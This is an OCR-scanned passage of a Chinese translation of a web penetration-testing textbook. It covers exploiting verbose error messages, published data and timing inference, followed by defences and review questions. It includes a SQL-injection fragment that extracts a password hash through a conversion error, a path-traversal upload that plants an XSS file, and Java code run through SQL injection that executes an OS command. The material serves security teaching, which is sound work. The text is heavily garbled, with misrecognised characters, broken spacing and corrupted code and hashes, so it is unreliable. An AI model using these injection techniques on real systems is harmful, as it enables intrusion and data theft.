谷 


15.1.4 ”服务 器 与 消息 


不 仅 应 用 程序 自嘲 ， 数 据 库 、 邮 件 服务 絮 或 SOAP 服 务 絮 等 后 端 
组 件 也 会 返回 详尽 的 错误 消息 。 如 果 发 生 完全 无 法 处 理 的 错误 ， 应 用 
程序 通常 会 返回 一 个 HTTP 500 状 态 码 ， 而 且 啊 应 主体 中 也 包括 其 他 与 
错误 有 关 的 信息 。 其 他 情况 下 ， 应 用 程序 会 对 错误 进行 适当 处 理 ， 并 
向 用 户 返 回 一 条 定制 消息 ， 其 中 有 时 还 包括 后 端 组 件 生成 的 错误 信 
息 。 在 某 些 情况 下 ， 信 息 披 露 本 身 可 能 被 攻击 者 当做 攻击 手段 。 应 用 
程序 通常 会 在 调试 消息 或 异常 错误 中 无 意 披露 信息 ， 因 此 组 织 的 安全 
规程 可 能 会 完全 忽略 这 种 信息 披露 。 

我 们 将 在 以 下 几 市 中 讲 到 ， 利 用 应 用 程序 返回 的 消息 ， 攻 击 者 可 
以 实施 一 系列 其 他 攻击 。 

o 利用 信息 披露 扩大 攻击 范围 

在 针对 服务 器 后 端 组 件 实施 特定 攻击 时 ， 这 些 组 件 在 遇 到 错误 时 
常常 会 提供 直接 反馈 。 渗 透 测试 员 可 以 利用 这 些 反 馈 对 攻击 进行 调 
整 。 数 据 库 错 误 消息 中 通常 包含 有 用 的 信息 。 例 如 ， 它 们 通常 会 披露 
造成 错误 的 查询 ， 渗 透 测 试 员 可 以 将 其 用 于 优化 SQL 注入 攻击 。 


Failed to retrieve row with statement SELECT object_ data FROM 


deftr.tbhlobject WHERE object_id = 'FDJ800012' AND vroject_id = ‘FOO’ 


and 


请 参阅 第 9 章 了 解 如 何 实施 数据 库 攻 击 ， 并 根据 错误 消息 提取 信息 
的 详细 方法 。 

@ 错误 消 居中 的 跨 站 点 脚本 攻击 

如 第 12 章 所 述 ， 针 对 路 站 点 脚本 的 安全 防御 是 一 个 艰巨 的 任务 ， 
需要 确定 用 户 提 交 的 数据 的 每 一 个 输出 位 置 。 虽 然 大 多 数 框 架 在 报告 
普 误 时 都 会 对 数据 进行 HTML 编 码 ， 但 并 不 是 所 有 框 染 都 这 样 做 。 错 
误 消息 常常 在 HTTP 啊 应 中 的 非常 规 位 置 多 次 出 现 。 在 Tomcat 使 用 的 
HttpServlet-Response.sendErrorO 调 用 中 ， 错 误 数 据 还 是 响应 消息 头 的 
一 部 分 : 


HTTP/1.1 500 General Error Accessing Doc10083011 
Server: Apache-Coyote/1.1 

Content-Type: text/html; charset=ISO-8859-1 
Content-Length: 1105 

Date: Sat, 23 Apr 2011 08:52:15 GMT 


Connection: close 


如 果 拥 有 对 输入 字符 串 Doc10083011 的 控制 权 ， 攻 击 者 就 可 以 提 
交换 行 字符 并 实施 HTTP 消 息 头 注入 攻击 ， 或 在 HITP 啊 应 中 实施 跨 站 
点 脚本 攻击 。 有 关 详 细 信 息 ， 请 访问 以 下 链接 : 

http://www.securityfocus.com/archive/1/495021/100/0/threaded 

i, RETIRE AE KSI Hl S SEAEHTMLA PR, 但 有 时 
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击 者 就 可 以 轻松 实施 跨 站 点 脚本 攻击 。 

o 信息 披露 中 的 解密 提示 

我 们 在 第 11 章 中 的 示例 讲 到 ， 利 用 应 用 程序 意外 显示 的 “加 密 提 
示 ”， 可 以 解密 以 加 蜜 格式 癌 用 户 显示 的 字符 串 。 信 息 披 露 也 会 导致 同 
样 的 问题 。 在 第 7 章 的 示例 中 ， 某 应 用 程序 提供 一 个 用 于 文件 访问 的 加 
密 下 载 链接 。 如 有 果 某 个 文件 已 被 移 走 或 删除 ， 应 用 程序 会 报告 无 法 下 
载 该 文件 。 当然 ， 错 误 消 息 中 包含 了 该 文件 的 解密 值 ， 因 此 ， 可 以 回 
该 下 载 链 接 提供 任何 加 密 的 “文件 名 ”， 从 而 导致 错误 。 

在 这 种 情况 下 ， 信 息 披 露 症 由 刻意 滥用 反馈 造成 的 。 如 果 对 参数 
进行 解密 ， 然 后 将 其 用 在 各 种 函数 中 ， 只 要 其 中 的 任何 函数 会 记录 数 
据 或 生成 错误 消息 ， 则 这 时 导致 的 信息 披露 往往 更 具 侦 发 性 。 例 如 ， 
笔者 曾 下 到 一 个 复 洒 的 工作 流程 应 用 程序 ， 该 应 用 程序 使 用 通过 客户 
端 传送 的 加 密 参 数 。 如 果 将 dbid 和 grouphome 的 默认 值 互 换 ， 应 用 程序 
将 返回 以 下 错误 : 


java.sGql.SQLException: Listener refused the connection with the 
following error: ORA-12505, TNS:listener Goes not currently know 

SID given in connect descriptor The Connection descriptor used 
by the client was: 172.16.214.154:1521:docs/londonoffice/2010/general 


这 段 消息 提供 了 相当 重要 的 信息 。 有 具体 来 说 ，dbid 实 际 上 是 Oracle 
数据 库 的 连接 的 加 密 SID (连接 描述 符 采 用 “服务 器 :端口 :SID” 的 形 
式 ) ，grouphome 则 为 加 密 的 文件 路 径 。 

在 以 下 与 许多 其 他 信息 披露 攻击 类 似 的 攻击 中 ， 了 解 文件 路 径 为 
攻击 者 提供 了 实施 文件 路 径 操 纵 攻 击 所 需 的 信息 。 在 文件 名 中 提供 3 个 


路 径 衣 历 字 符 ， 并 向 上 导航 类 似 的 目录 结构 ， 束 可 以 直接 问 其 他 组 的 
工作 空间 上 传 包含 恶意 代码 的 文件 : 


POST /dashboard/utils/fileupload HTTP/1.1 

Accept: text/html, application/xhtml+xml, */* 

Referer: http: //wahh/Gashboard/common/newnote 

Accept-Language: en-GB 

Content-Type: multipart/form-data; boundary=------ 7absIa439b04c0 
Accept-Encoding: gzip, deflate 

Host: wahh 

Content-Length: 8088 

Proxy-Connection: Keep-Alive 


athe heeded 7db3d439b04c0 
Content-Disposition: form-data; name="MAX_FILE_SIZE" 


100000 

=-=- 1apb3ia4393b04c0 

Content-Disposition: form-data; name="uploadedfile"; filename="../../../ 
newportoffice/2010/general/xss.html” 

Content-Type: text/html 

<html><body><script>... 


渗透 测试 步骤 


(1) 当 通 过 在 不 同 的 参数 中 提交 专门 设计 的 攻击 字符 串 ， 探 
查 应 用 程序 中 是 否 存在 币 见 的 漏洞 时 ， 应 始终 监控 应 用 程序 的 啊 
必 ， 以 确定 任何 可 能 包含 有 用 信息 的 错误 消 轧 。 

芝 试 通过 在 错误 的 情况 下 提交 加 密 数 据 字 符 串 ， 或 通过 对 未 处 

的 正确 状态 的 资源 执行 操作 ， 强 制 应 用 程序 返回 错误 啊 
WA (0) 

(2) 注意 ， 在 服务 器 啊 应 中 返回 的 错误 消息 可 能 不 会 在 浏览 
亏 中 显示 。 因 此 ， 确 定 错误 条 件 的 有 效 方法 ， 是 在 每 一 个 原始 啊 应 
中 得 找 经 常 出 现在 错误 消 轧 中 的 关键 季 。 例 如 : 


g error 

g exception 
g illegal 

g invalid 


g fail 
g stack 
g access 
Q directory 
g file 
口 not found 
口 varchar 
口 ODBC 
g SQL 
OD SELECT 
(3) 在 基本 请 求 中 发 送 一 系列 修改 参数 的 请 求 时 ， 为 避免 错 
误 警 报 ， 应 检查 最 初 的 请 求 是 否 已 经 包含 任何 正在 寻找 的 关键 字 。 
(4) 可 以 使 用 Burp Intruder 中 的 Grep 函 数 迅 速 确定 在 由 某 个 攻 
击 生 成 的 任何 响应 中 出 现 的 有 用 的 关键 字 (请 参阅 第 14 章 了 解 相关 
内 容 ) 。 如 果 发 现 匹配 的 关键 字 ， 应 手动 检查 相关 响应 ， 确 定 应 用 
程序 是 否 返 回 任何 有 用 的 错误 信息 。 


Vv 提示 查看 浏览 器 中 的 服务 器 的 响应 时 要 注意 ， 默 认 情 况 
F, Internet Explorer 会 隐藏 许多 错误 消息 ， 并 用 一 个 常规 页 面 代替 
Ei] o a NEE TLR” > “Internet 选 项 ” (Tools > Internet 
Options) ， 然 后 在 “高 级 ”(Advanced) 选项 卡 中 禁用 这 种 行为 。 


15.1.5 “使 用 公共 信息 


由 于 Web 应 用 程序 通常 会 采用 大 量 各 不 相同 的 技术 与 组 件 ， 因 此 
渗透 测试 员 经 常会 遇 到 一 些 以 前 从 未 见 过 的 错误 消 电 ， 它 们 可 能 不 会 
立即 揭示 应 用 程序 中 出 现 的 错误 的 本 质 。 在 这 种 情况 下 ， 可 以 从 各 种 
公共 资源 获得 更 多 与 错误 消息 有 关 的 信息 。 

通常 ， 不 常见 的 错误 消 恩 往往 钙 由 某 个 特定 的 API 故 障 造 成 的 。 
对 消 恩 文本 进行 搜索 束 可 以 找到 这 个 API 的 文档 资料 或 开发 者 论坛 ， 

以 及 讨论 这 个 问题 的 其 他 位 置 。 

许多 应 用 程序 采用 第 三 方 组 件 执 行 一 些 常 见 的 任务 ， 如 搜索 、 购 
物 篮 和 站 点 反馈 功能 。 这 些 组 件 生 成 的 任何 错误 消 轧 可 能 已 经 出 现在 
其 他 应 用 程序 中 ， 并 被 人 们 在 其 他 地 方 讨论 。 

一 些 应 用 程序 中 合并 了 公开 发 布 的 源 代码 。 通 过 搜索 出 现在 不 肖 
见 错误 消 妃 中 的 一 些 特殊 的 表达 式 ， 束 可 以 找到 实际 执行 相关 功能 的 
源 代码 。 然 后 检查 这 些 代 码 ， 了 解 它们 对 输入 执行 了 何 种 处 理 以 及 如 
何 操纵 应 用 程序 ， 从 而 对 某 个 漏洞 加 以 利用 。 


渗透 测试 步骤 


(1) 使 用 标准 搜索 引擎 搜索 任何 不 常见 的 错误 消息 的 文本 。 
可 以 使 用 各 种 高 级 搜索 特性 纵 小 搜索 范围 ， 例 如 : 


"unable to retrieve" filetype:php 


(2) 检查 搜索 结果 ， 寻 找 所 有 关于 错误 消息 的 讨论 以 及 其 他 
出 现 相同 消息 的 站 点 。 其 他 应 用 程序 生成 的 同一 条 错误 消息 可 能 更 
详细 ， 有 助 于 更 好 地 了 解 错 误 条 件 。 使 用 搜索 引擎 绥 存 获取 不 再 出 
现在 当前 应 用 程序 中 的 错误 消息 。 

(3) 使 用 Google 代 码 搜索 查找 任何 生成 特定 错误 消息 的 、 公 
开发 布 的 代码 。 搜 索 可 能 被 硬 编码 到 应 用 程序 源 代码 中 的 错误 消息 
ge eee 
细节 ， 例 如 : 


=(select password from users where uid=1)-- 


(4) 如 果 获 得 了 包含 库 与 第 三 方 代码 组 件 名 称 的 栈 追 踪 ， 在 
上 述 两 种 搜索 引擎 中 搜索 这 些 名 称 。 


15.1.6 制造 详尽 的 错误 消息 


有 些 情况 下 渗透 测试 员 可 以 系统 性 地 制造 错误 条 件 ， 以 获取 错误 
(AAP AUREUS o 

假如 能 让 应 用 程序 对 一 个 特殊 的 数据 执行 某 种 无 效 的 操作 ， 束 可 
能 出 现 上 述 情 况 。 如 果 生 成 的 错误 消息 揭示 该 数据 的 值 ， 束 可 以 让 应 
用 程序 以 这 种 方式 处 理 有 用 的 信息 ， 然 后 利用 这 种 行为 从 应 用 程序 中 
提取 任意 数据 。 

可 以 在 SQL 注入 攻击 中 利用 详尽 的 开放 式 数 据 库 连 接 (ODBC) 
错误 消息 检索 任意 数据 库 碍 询 的 结果 。 例 如 ， 如 果 将 以 下 SQL 注入 
WHERE 子 句 中 ， 将 导致 数据 库 将 用 户 才 中 第 一 个 用 户 的 密码 转换 为 
整数 ， 以 执行 求 值 操作 : 


Error: Conversion failed when converting the varchar value 
'37CE1CCA753 08590B4D6A35FP288B58FACDBB0841' to data type int. 
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Frvov: Conversion failed when converting the Varcnar value 
'37CF1ICCATS 30859 GF 4NS6A3 SF AGEASEFACNI36841' to data type int. 


尝试 访问 : 


http://mdsec.net/addressbook/32 


此 外 ， 如 末 茶 个 应 用 程序 销 译 生成 一 个 包含 销 译 搬 述 的 栈 退 踩 ， 
oe 这 种 技巧 制造 一 种 情形 ， 让 应 用 程序 将 有 用 的 信息 合并 到 
cipal 
一 些 数 据 库 允 许 用 户 创建 用 Java 编 写 的 目 定义 函数 。 在 这 种 情况 
下 ， 渗 透 测 试 员 可 以 利用 一 个 SQL 注入 漏洞 创建 目 己 的 男 数 ， 执 行 任 
意 任 务 。 如 采 应 用 程序 向 浏 览 右 返回 错误 消 恩 ， 束 可 以 让 创建 的 函数 
生成 一 个 包含 任何 想 要 的 数据 的 异常 。 例 如 ， 下 面 的 代码 将 运行 操作 
系统 命 信 ls， 然后 生成 一 个 包含 合 令 输出 结 末 的 异 第 。 它 将 同 浏览 器 
返回 一 个 栈 追 踩 ， 其 中 第 一 行 包含 一 个 目 永 列表 : 


ByteArrayCutputStream baos = new ByteArrayOutputStream{); 
try 
{ 
Process p = Runtime.getRuntime().exec("1s"); 
InputStream is = p.getInputStream({}); 
int c; 
while (-1 != (c = is.read())) 


baos.write(({byte) c); 


catch (Exception e} 


} 


throw new RuntimeException(new String(baos.toByteArray())); 


15.2 公布 的 信息 


除 在 错误 消息 中 泄露 有 用 的 信息 外 ，Web 应 用 程序 直接 公布 的 信 
思 也 是 它 披露 敏感 数据 的 另 一 个 主要 源头 。 由 于 以 下 原因 ， 应 用 程序 
可 能 会 公布 对 攻击 者 有 利 的 信息 。 
口 公布 的 信息 在 设计 上 属于 应 用 程序 核心 功能 的 一 部 分 。 
口 公布 的 信息 会 无 意 中 给 其 他 功能 造成 负面 影响 。 
口 由 仍然 存在 于 当前 应 用 程序 中 的 调试 功能 泄露 信息 。 
口 由 于 某 个 漏洞 (如 访问 控制 不 完善 ， 而 导致 信息 泄露 。 
应 用 程序 可 能 同 用 户 公 布 的 敏感 信息 通常 包括 以 下 几 项 。 
口 有 效用 户 名 、 账 号 与 文档 ID 列表 。 
口 用 户 个 人 资料 ， 包 括 用 户 角色 与 权限 、 最 后 登录 日 期 与 账户 状 


ee ee 
源 代码 中 ) 。 

口 包 含 在 日 志文 件 中 的 信息 ， 如 用 户 名 、URL、 执 行 的 操作 、 会 
牌 与 数据 库 查 询 。 

口 客户 端 HTML 源 代码 中 与 应 用 程序 有 关 的 细 和 ， 如 作为 注释 处 
理 的 链接 或 表单 字段 以 及 关于 漏洞 的 注释 。 


Crt 


=H 
Ey 


TH 
Ap 


渗透 测试 步骤 


(1) 检查 应 用 程序 解析 过 程 中 得 到 的 结果 (请 参阅 第 4 章 了 
e a 
IAI ° 


(2) 在 应 用 程序 中 确定 服务 器 向 浏览 器 返回 密码 或 信用 卡 资 
料 等 敏感 数据 的 所 有 位 置 。 即 使 这 些 信 息 在 屏幕 上 隐藏 显示 ， 但 仍 
然 可 以 在 服务 絮 的 啊 应 中 看 到 这 些 信息 。 如 采 发 现 其 他 适当 的 漏 
洞 ， 例 如 访问 控制 或 会 话 处 理 方面 的 漏洞 ， 束 可 以 利用 这 种 行为 获 
取 属 于 其 他 应 用 程序 用 户 的 信息 。 

(3) 如 果 已 经 确定 任何 提取 敏感 信息 的 方法 ， 请 使 用 第 14 章 
描述 的 拉 巧 目 动 攻击 解析 过 程 。 


15.3 “使 用 推论 


有 些 情况 下 ， 应 用 程序 可 能 不 会 直接 泄露 任何 数据 ， 但 可 以 根据 
它 的 行为 准确 推断 出 有 用 的 信息 。 

在 探查 其 他 类 型 漏洞 的 过 程 中 ， 我 们 已 经 遇 到 过 许多 以 这 种 方式 
泄露 信息 的 情况 ， 如 下 所 示 。 

口 注册 功能 允许 在 选择 已 经 存在 的 用 户 名 时 根据 出 现 的 错误 消 筷 
MUZE HH IEMA ALA 

口 搜索 引擎 允许 推断 出 未 获 授权 就 可 直接 查看 的 编 入 索引 的 文档 

内 容 〈 请 参阅 第 11 章 了 解 相关 内 容 ) 。 
口 在 盲目 SQL 注 入 漏洞 中 ， 可 以 通过 给 一 个 现 有 的 查询 增加 一 个 
二 进 制 条 件 ， 一 次 一 位 地 提取 信息 (请 参阅 第 9 革 了 解 相 关内 容 ) 。 
口 .NET 中 的 “填充 提示 ”攻击 ， 在 这 种 攻击 中 ， 攻 击 者 可 以 通过 问 
服务 器 发 送 一 系列 请 求 ， 并 观察 哪些 请 求 在 解密 期 间 守 人 致 错 座 ， 从 而 
解密 任何 字符 串 《请 参阅 第 18 章 ) 。 

另外 ， 根 据 茶 种 对 攻击 者 有 利 的 事实 ， 如 采 应 用 程序 执行 不 同 操 
作 所 用 的 时 间 各 不 相同 ， 那 么 ， 应 用 程序 行为 上 的 这 种 细微 差异 也 会 
导致 信息 泄露 。 这 种 差异 由 以 下 原因 造成 。 

口 许多 复杂 的 大 型 应 用 程序 需要 从 数据 库 、 消 息 队 列 与 大 型 主机 
等 后 山 系统 中 提取 数据 。 为 提高 性 能 ， 一 些 应 用 程序 缓存 频繁 使 用 的 
信息 。 同 样 ， 一 些 应 用 程序 采用 一 种 延迟 加 载 lazy load) 模式 ， 仅 
在 需要 时 加 载 对 象 和 数据 。 在 这 种 情况 下 ， 应 用 程序 会 从 服务 紫 的 本 
地 缓存 中 迅速 提取 出 最 近 访 问 的 数据 ， 而 从 相关 后 端 系统 中 相对 缓慢 
地 提取 出 其 他 数据 。 

电子 银行 应 用 程序 种 和 营 以 这 种 方式 运作 ， 与 活动 账户 相 比 ， 
访问 一 个 休眠 账户 通常 需要 更 长 的 时 间 ， 这 时 ， 技 巧 熟 练 的 
ee eee ere 


口 有 些 时 候 ， 应 用 程序 处 理 某 个 特殊 请 求 所 花 的 时 间 取 决 于 用 户 
提交 的 数据 是 否 有 效 。 例 如 ， 如 果 回 登录 机 制 提交 一 个 有 效 的 用 户 
名 ， 应 用 程序 殊 会 执行 各 种 数据 库 查 询 ， 获 取 账 户 信 息 并 更 新 审计 日 
志 ， 同 时 执行 需要 进行 大 量 计算 的 操作 ， 根 据 保存 的 散 列 确认 用 户 提 
交 的 密码 。 如 有 果 攻 击 者 能 够 探测 到 这 种 时 间 差 异 ， 他 殉 能 利用 它 枚 举 
有 效 的 用 户 名 。 


口 一 些 应 用 程序 可 能 会 根据 用 户 输入 执行 一 项 操作 。 如 果 用 户 提 
交 的 某 个 数据 无 效 ， 束 会 造成 超时 。 人 例如， 如果 某 应 用 程序 使 用 
cookie 保 存 一 个 前 端 负载 均衡 器 (load balancer) 之 内 的 主机 地 址 ， 攻 
击 者 束 可 以 操纵 这 个 地 址 ， 扫 摘 组 织 内 部 网 络 中 的 Web 有 服务器。 如果 
提交 的 服务 器 地 址 不 属于 应 用 程序 基础 设施 的 范围 ， 应 用 程序 就 会 立 
即 返 回 一 个 错误 。 如 果 提 交 一 个 不 存在 的 地 址 ， 那 么 尝试 连接 这 个 地 
目 就 会 造成 超时 ， 然 后 应 用 程序 再 返回 与 上 一 种 情况 相同 的 常规 错 
误 。 攻 击 者 可 以 利用 Burp Intruder 结果 表 中 的 啊 应 计时 妖 进 行 这 种 测 
i oc YER, BAA OL Pie ea Bae A OL, (Ey aah Columns% fit 


ZJN ° 


渗透 测试 步骤 


(1) 应 用 程序 响应 时 间 上 的 差异 可 能 非常 微小 ， 难 以 探测 。 

只 有 在 癌 关 键 区 域 提交 重要 的 数据 以 及 所 执行 的 处 理 很 可 能 
会 导致 时 间 差 异 时 ， 才 值得 在 应 用 程序 中 探 碍 这 种 行为 。 

(2) 为 测试 某 个 特殊 的 功能 ， 编 辑 两 个 列表 ， 其 中 分 别 包含 


儿 个 已 知 有 效 (或 最 近 被 访问 ) 的 数据 和 已 知 无 效 (或 休眠 状态 ) 
的 数据 。 以 可 控制 的 方式 提出 包括 这 两 个 列表 中 的 每 一 个 数据 的 请 
求 ， 一 次 仅 提出 一 个 请 求 ， 然 后 监控 应 用 程序 响应 每 个 请 求 所 用 的 
时 间 。 确 定数 据 的 状态 与 响应 时 间 之 间 是 否 存 在 任何 关联 。 

(3) 可 以 使 用 Burp Intruder 自 动 完成 这 项 任务 。 对 于 每 一 个 生 
成 的 请 求 ，Intruder 将 自动 记录 应 用 程序 响应 前 所 用 的 时 间 以 及 完成 
e a 还 可 以 按 这 些 属性 对 结果 表 进 行 分 类 ， 迅 速 确定 
AR Ee 


15.4 ”防止 信息 泄露 


虽然 我 们 不 可 能 或 无 法 完全 阻止 泄露 对 攻击 者 有 用 的 信息 ， 但 可 
以 采取 各 种 相对 位 单 的 措施 ， 最 大 限度 地 减少 信息 泄露 ， 防 止 将 最 敏 
感 的 数据 泄露 给 攻击 者 ， 避 人 免 应 用 程序 的 安全 造成 站 重 破 坏 。 


15.4.1 使 用 常规 错误 消息 


应 人 禁止 应 用 程序 同 用 户 的 浏览 器 返回 详尽 的 错误 消息 或 调试 信 
上 筷 。 如 果 发 生 无 法 预料 的 错误 (如 数据 库 查 询 错 误 、 人 磁盘 文件 读 取 故 
障 或 外 部 API 调 用 异常 ) ， 应 用 程序 应 返回 相同 的 常规 消息 ， 通 知 用 
户 出 现 错误 。 如 果 因 为 文 持 或 诊断 目的 而 有 必要 记录 调试 信息 ， 那 么 
将 这 些 信息 保存 在 一 个 用 户 无 法 公开 访问 的 服务 右 端 日 志 中 ， 并 在 必 
要 时 间 用 户 返 回 相 关 日 志 记录 的 索引 号 ， 方 便 他 们 在 联系 服务 人 台 时 报 
告 这 个 错误 © 

可 以 配置 大 多 数 应 用 程序 平台 与 Web 服 务 器 ， 使 其 拦截 错误 消 
B, PRERE AE 

口 在 ASPNET 中 ， 可 以 使 用 Web.config 文 件 的 customErrors 元 率 ， 
通过 设置 mode 属 性 为 On 或 RemoteOnly， 并 在 defaultRedirectT 点 指定 
一 个 定制 错误 页 面 ， 从 而 阻止 详尽 的 错误 消息 。 

口 在 Java Platform 中 ， 可 以 使 用 web.xml 文 件 的 errorpage 元 素 配 置 
定制 错误 消息 。exception-type 信 点 可 用 于 指定 一 个 Java 异常 类 型 ， 或 
者 使 用 error-code 节 点 指定 一 个 HITP 状 态 码 ; (EMH location t Aa NiE 
发 生 错 误 时 显示 的 定制 页 面 。 

口 在 Microsoft IIS 中 ， 可 以 使 用 一 个 Web 站 点 属性 页 面 的 “定制 错 
im” (Custom Errors) 选项 卡 ， 为 不 同 的 HTTP 状 态 码 指定 定制 错误 页 
面 。 如 有 必要 ， 可 在 每 个 目录 的 基础 上 为 每 个 状态 码 设置 一 个 不 同 的 
定制 页 面 。 

口 在 Apache 中 ， 可 以 使 用 httpd.conf 中 的 ErrorDocument 指 令 配置 
定制 错误 页 面 。 例 如 : 


15.4.2 感 信息 


只 要 有 可 能 ， 应 禁止 应 用 程序 公布 对 攻击 者 有 用 的 信息 ， 包 括 用 
尸 名 、 日 志 记 录 或 用 户 个 人 资料 。 如 果菜 些 用 户 需 要 访问 这 些 信息 ， 
E 
AE E E ° 

如 果 必 须 向 授权 用 户 透 露 敏感 信息 (例如 ， 以 便 用 户 更 新 他 们 的 
账户 信息 ) ， 那 么 在 不 必要 时 也 不 得 披露 现 有 数据 。 例 如 ， 应 以 截 短 
的 形式 显示 保存 的 信用 卡号 ， 绝 不 能 预先 填写 密码 字段 ， 即 使 它 在 屏 
幕 上 隐藏 显示 。 这 些 防御 措施 有 助 于 减轻 验证 、 会 话 管 理 与 访问 控制 
等 应 用 程序 核心 安全 机 制 中 存在 的 闻 重 漏洞 造成 的 影响 。 


15.4.3 ”尽量 减少 客户 端 信息 泄露 


只 要 有 可 能 ， 应 删除 或 修改 服务 旗 标 ， 避 人 免 泄 露 特 定 软 件 版 本 等 
言 电 。 执 行 这 种 防御 所 需 的 步骤 依 应 用 程序 所 使 用 的 技术 而 定 。 例 
如 ， 在 Microsoft IIS 中 ， 可 以 使 用 IISLockDown 工 具 中 的 URLScan 删 除 
Server 消 轧 涉 。 在 最 新 版 本 的 Apache 中 ， 使 用 mod_headers 模 块 可 达到 
相同 的 目的 。 由 于 这 些 信息 会 随时 改变 ， 建 议 在 进行 任何 修改 之 前 查 
阅 服务 器 上 的 文档 资料 。 

另外 ， 还 应 删除 部 署 在 当前 生产 环境 中 的 客户 端 代 码 (RSE 
HTML 与 JavaScript 代码 ) 中 的 所 有 注释 。 

还 要 特别 注意 任何 厚 客 户 端 组 件 ， 如 Java applet 和 Activex 挥 
件 。 不 得 在 这 些 组 件 中 包含 任何 敏感 信息 。 技 术 熟 练 的 攻击 者 能 够 破 
译 或 逆 同 制造 这 些 组 件 ， 恢 复 它们 的 源 代码 〈 请 参阅 第 5 章 了 解 相关 


内 容 ) 。 


15.5 小结 


涝 露 不 必要 的 信息 通常 不 会 对 应 用 程序 的 安全 造成 站 重 影响。 有 
时 ， 即 使 古 非 常 详细 的 栈 追 踩 与 其 他 调试 消 忌 ， 也 不 会 为 攻击 应 用 程 
序 提 供 很 大 帮助 。 

然而 ， 在 其 他 情况 下 ， 渗 透 测 试 员 可 能 会 发 现 非常 有 利于 实施 攻 
击 的 信息 来 源 ， 例 如 ， 它 们 披露 了 用 户 名 列表 、 软 件 组 件 的 准确 版 
本 ,或 者 泄露 服务 器 端 应 用 程序 逻辑 的 内 部 结构 与 功能 。 

为 此 ， 要 对 应 用 程序 实施 三 重 的 攻击 ， 活 透 测试 员 必 须 对 应 用 程 
序 目 号 及 公开 货源 进行 仔细 的 核查 ， 收 集 有 助 于 发 动 攻击 的 信息 。 有 
ee 
用 程序 。 


15.6 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh ° 
(1) 当 探 查 SQL 注 入 漏洞 时 ， 如 果 请 求 以 下 URL: 


https: //wahh-app.com/list.aspx?artist=foo'+having+1%3da1-- 
将 会 收 到 如 下 错误 消息 : 


Server: Msg 170, Level 15, State 1, Line 1 
Line 1: Incorrect syntax near ‘havingl1'. 


从 中 可 以 得 出 什么 结论 ?应 用 程序 中 包含 任何 可 被 利用 的 条 件 
15? 
(2) 当 对 各 种 参数 进行 模糊 测试 时 ， 应 用 程序 返回 以 下 错误 消 


Warning: mysql connect() [function.mysql-connect] 


: Access denied for 
user 'premiumdde'@'localhost' (using password: YES) in 
/nome/doau/public_html/premiumdde/directory on line 15 

Warning: mysaql_select_db({) [function.mysqi-select-db]: Access denied 
for user 'nobody'@'localhost' {using password: NO) in 
fnome/doau/public html/premiumdde/Girectory on line 16 

Warning: mysql_select_db({} [function.mysqi-select-db]: A link to 

the server could not be established in 
/nome/doau/public_html/premiumdde/directory on line 16 

Warning: mysql_query() [function.mysal-query]: Access denied for 
user ‘nobody'@'*localhost' (using password: NO) in 

fnome/doau/public html/premiumdde/Girectory on line 448 


从 中 可 以 获得 哪些 有 用 的 信息 ? 
(3) 在 解析 应 用 程序 的 过 程 中 ， 在 服务 器 上 发 现 了 一 个 激活 目录 
列表 的 隐藏 目 永 ， 其 中 似乎 保存 着 大 量 以 前 用 过 的 脚本 。 请 求 其 中 一 
个 脚本 返回 以 下 错误 请 悬 : 


CGIWrap Error: Execution of this script not permitted 
Execution of [contact.pl1}) is not permitted for the following reason: 


Script is not executable. Issue 'chmod 755 filename’ 


Local Information and Documentation: 
CGiIwrap Docs: http://wahh-app.com/cgiwrap-docs/ 
Contact EMail: helodesk@wahh-app.com 


Server Data: 

Server Administrator/Contact: helpcesk@wahh-app.com 

Server Name: wahh-app.com 

Server Port: 80 

Server Protocol: HETTP/1.1 

Request Data: 

User Agent/Browser: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 
5.1; .NET CLR 2.0.50727; FDM; InfoPath.1; .NET CLR 1.1.4322) 
Request Method: GET 

Remote Address: 192.168.201.19 

Remote Port: 57961 

Referring Page: http://wahh-app.com/cgi-bin/cgiwrap/fodda 


是 什么 原因 造成 了 这 个 错误 ?可 以 了 立即 发 现 哪 些 和 常见 的 Web 应 用 
程序 漏洞 ? 

(4) 在 探查 一 个 请 求 参数 的 功能 并 试图 确定 它 在 应 用 程序 中 的 作 
用 时 ， 如 果 请 求 以 下 URL: 

https://wahh-app.com/agents/checkcfg.php? 
name=admin&id=13&log=1 

应 用 程序 将 返回 以 下 错误 消息 : 


Warning: mysql_connect{) [function.mysal-connect]: Can't connect to 


MySQL server on ‘admin’ (10013) in 
/var/local/www/include/dbconfig.php on line 23 


这 条 错误 消息 是 由 什么 原因 造成 的 ? 为 此 应 探查 什么 漏洞 ? 

(5) 当 模 糊 测 试 一 个 请 求 ， 看 其 中 是 否 存 在 各 种 漏洞 时 ， 测 试 员 
轮流 在 每 个 请 求 参数 中 提交 了 一 个 单 引 号 。 其 中 一 个 请 求 的 啊 应 包含 
了 一 个 HTTP 500 状 态 码 ， 表 示 应 用 程序 可 能 存在 SQL 注入 漏洞 。 消 息 
的 全 部 内 容 如 下 : 


Microsoft VBScript runtime error '800a000d' 
Type mismatch: ' [string: ""'"]' 
/scripts/confirmOrder.asp, line 715 


该 应 用 程序 是 否 易于 受到 攻击 ? 


第 16 章 
攻击 本 地 编译 型 应 用 程序 


过 去 ， 在 本 地 执行 环境 中 运行 的 编译 型 软件 一 直 受 到 缓冲 区 溢出 
与 格式 化 字符 串 (format string) 等 漏洞 的 困扰 。 如 今 ， 绝 大 多 数 的 
Web 应 用 程序 都 是 使 用 在 托管 执行 环境 中 运行 的 语言 和 平台 编写 的 ， 

这 个 环境 中 不 存在 上 述 典型 漏洞 。 使 用 C# 和 Java 这 类 语言 的 一 个 主要 
优点 在 于 ， 程 序 员 不 必 再 担心 缓冲 区 管理 与 指针 算法 等 问题 这些 问 
题 曾 给 以 本 地 语言 (如 C 和 C++) 开发 的 软件 造成 重大 影响 ， 并 且 是 这 
些 软 件 中 绝 大 多 数 严 重 漏洞 的 根源 所 在 。 

但 是 ， 有 时 也 会 遇 到 用 本 地 代码 编写 的 Web 应 用 程序 。 而 且 ， 许 
多 主要 使 用 托管 代码 编写 的 应 用 程序 同样 包含 本 地 代码 或 调用 在 非 托 
管 环境 中 运行 的 外 部 组 件 。 除 非 渗 透 测试 员 确 切 地 知道 所 针对 的 应 用 
程序 并 不 包含 任何 本 地 代码 ， 人 否则 束 有 必要 对 它 进行 一 些 基 本 的 检 
查 ， 查 明 其 中 是 否 存在 任何 常见 的 漏洞 。 

在 打印 机 与 交换 机 等 硬件 设备 上 运行 的 Web 应 用 程序 常 稼 使 用 时 
